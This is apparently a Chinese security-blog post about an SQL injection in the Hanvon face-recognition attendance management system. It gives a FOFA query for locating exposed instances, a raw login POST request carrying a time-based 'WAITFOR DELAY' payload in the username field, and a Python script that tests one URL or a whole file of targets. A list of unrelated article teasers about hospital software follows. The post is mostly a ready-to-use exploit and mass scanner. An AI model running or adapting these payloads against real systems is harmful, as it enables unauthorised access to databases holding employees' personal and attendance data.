汉王人脸考勤管理系统

简介: 汉王人脸考勤管理系统

漏洞简介


 汉王考勤管理系统简化版是是汉王人脸通考勤机的配套软件,满足客户的日常基本使用需要。汉王考勤管理系统第一次使用,需要完成一些例如服务器设置、员工信息、考勤规则、单位班次及员工排班等基本设置。该软件存在SQL注入,可获取数据库敏感信息。


FOFA语句


"汉王人脸考勤管理系统"


影响范围

汉王人脸考勤管理系统


漏洞复现


在登录框处抓包验证


poc


POST /Login/Check HTTP/1.1
Host: xxx.xxx.xxx.xxx
Content-Length: 50
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://xxx.xxx.xxx.xxx
Referer: http://xxx.xxx.xxx.xxx
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: ASP.NET_SessionId=d3bcakylkgolfzy3ftefkcqb
Connection: close
strName=admin';WAITFOR DELAY '0:0:5'--&strPwd=dasd


如果返回ok,说明存在SQL注入

640.png

python脚本


import requests
import sys
import argparse
from requests.packages.urllib3.exceptions import InsecureRequestWarning  #消除警告
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)  # 消除警告
def lemonlove7():
    print('python xxx.py -u/--url http://xxx.xxx.xxx.xxx')
    print('python xxx.py -f/--file x.txt')
    print('FOFA:"汉王人脸考勤管理系统"')
    print('lemonlove7')
if len(sys.argv)==1:
    lemonlove7()
    sys.exit()
p = argparse.ArgumentParser(description='lemonlove7')
p.add_argument('-u','--url',help='输入url',default='')
p.add_argument('-f','--file',help='输入文件',default='')
a = p.parse_args()
url = a.url
file = a.file
headers= {
    'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36',
    'Content-Type':'application/x-www-form-urlencoded; charset=UTF-8',
    'Cookie':'ASP.NET_SessionId=d3bcakylkgolfzy3ftefkcqb'
}
data="strName=admin';WAITFOR DELAY '0:0:5'--&strPwd=dasd"
if url != '':
    furl = url
    try:
        url =furl+'/Login/Check/'
        r= requests.post(url=url,headers=headers,data=data,timeout=10,verify=False)
        if r.status_code == 200 and 'ok' in r.text:
            print(furl+'存在sql注入')
        else:
            print(furl+'不存在sql注入')
    except Exception as e:
        print(furl+'不存在sql注入')
if file !='':
    text =file
    f = open(text,'r+')
    for i in f.readlines():
        url = i.strip()
        if url.startswith('http:') != 1 and url.startswith('https:') != 1:
            url = 'http://' + url
        url1 = url
        url2=url
        try:
            url1 = url+'/Login/Check/'
            r =requests.post(url=url1,headers=headers,data=data,timeout = 10,verify=False)
            if r.status_code==200 and 'ok' in r.text:
                print(url2+'存在sql注入')
            else:
                print(url2+'不存在sql注入')
        except Exception as e:
            print(url2+'不存在sql注入')


运行效果如下:

640.png




相关文章
|
4月前
|
机器学习/深度学习 存储 人工智能
医院智能导诊系统源码的开发与运用
医院智能导诊系统是一款基于人工智能技术的医疗辅助系统。通过对患者的症状和需求进行深度学习和智能分析,系统能够准确判断患者的病情,为其推荐合适的科室和医生,实现快速、精准的导诊服务。
|
6月前
|
机器学习/深度学习 自然语言处理 安全
智慧医院智能导诊系统源码
智慧导诊系统通过与医院HIS系统结合,还可实现整个就诊流程指引服务。患者只需要关注医院微信公众号,即可享受从挂号,缴费,体检,住院等就诊一系列的便民服务。
80 0
|
25天前
|
传感器 数据采集 安全
C#智慧医院手麻系统源码 医院手术麻醉系统源码 支持三甲医院评级需求 可提供演示
手术麻醉管理系统是应用于医院手术室、麻醉科室的计算机软件系统。该系统针对整个围术期,对病人进行全程跟踪与信息管理,自动集成病人HIS、LIS、RIS、PACS信息,采集监护等设备数据,根据质控要求自动生成电子单据,把麻醉医生从繁重的单据记录中解放出来,从而有更多时间为手术顺利进行保驾护航。麻醉信息管理系统覆盖了从患者入院,经过术前、术中、术后,直至出院的全过程。通过与医院信息系统的信息集成,与监护设备的数据集成,实现了围术期患者信息的自动采集与共享,建立围术期电子病历
14 0
|
1月前
|
小程序 安全 搜索推荐
​ C#掌上医院预约挂号系统源码 一套成熟的医院/诊所预约挂号小程序需要了解哪些方面?
"互联网+医院"服务水平不断的提升,各类门诊部、中医馆、诊所、乡镇卫生院、社区卫生服务中心等医疗机构服务形式开始拓展互联网线上渠道。利用微信小程序、公众号(服务号)+网页端等形式进行开发,其中,预约小程序,门诊预约挂号系统的稳定性强、运行维护方便、是被众多医院机构信任与选择的。
|
2月前
|
人工智能 监控 数据可视化
智慧工地云平台源码支持人脸识别考勤 支持多工地
智慧工地是指利用云计算、大数据、物联网、移动互联网、人工智能等技术手段,为建筑施工现场提供智能硬件及物联网平台的解决方案,以实现建筑工地的实时化、可视化、多元化、智慧化和便捷化。
51 3
|
3月前
|
小程序 前端开发 C#
C#三甲医院在线预约挂号系统源码
医院在线预约挂号系统是一种方便患者预约挂号的系统,患者可以通过该系统进行预约挂号,省去了到医院现场排队等待的时间,提高了就诊效率。随着医院信息化水平的不断发展,医院在线预约挂号管理系统已成为医院管理中不可或缺的一部分。
58 1
|
3月前
|
数据采集 小程序 数据管理
智慧校园智能电子班牌系统源码
智慧校园系统是利用物联网和云计算,强调对教学、科研、校园生活和管理的数据采集、智能处理、为管理者和各个角色按需提供智能化的数据分析、教学、学习的智能化服务环境。它包含“智慧环境、智慧学习、智慧服务、智慧管理”等层面的内容。
31 0
|
4月前
|
安全
医院手术室麻醉系统源码、对接HIS、文书模板
麻醉医生在长期的临床工作实践中,已掌握了极其专业的镇静、镇痛技术,具备随时处理、预防药物带来各种风险的能力。
32 1
|
4月前
|
供应链 安全 Cloud Native
Java基层医疗云HIS系统源码,病患挂号、问诊、电子病历、开药发药、会员管理、统计查询、医生站和护士站
针对基层医院的业务特点,实现以财务核算为基础,以临床医疗服务为中心的全程信息化管理,主要包括以下业务模块:门诊住院一卡通收费管理、以电子病历为核心的门急诊医护工作站、药品管理、医技管理、检验(LIS)、检查(PACS)、远程医疗等。基层医生在接诊过程中可随时调阅、更新患者的健康档案,实现诊疗服务与公共卫生服务联动。
36 2
|
4月前
|
移动开发 自然语言处理 前端开发
智能导诊系统、智能在线问诊系统源码
智能导诊系统、智能在线问诊系统源码
81 0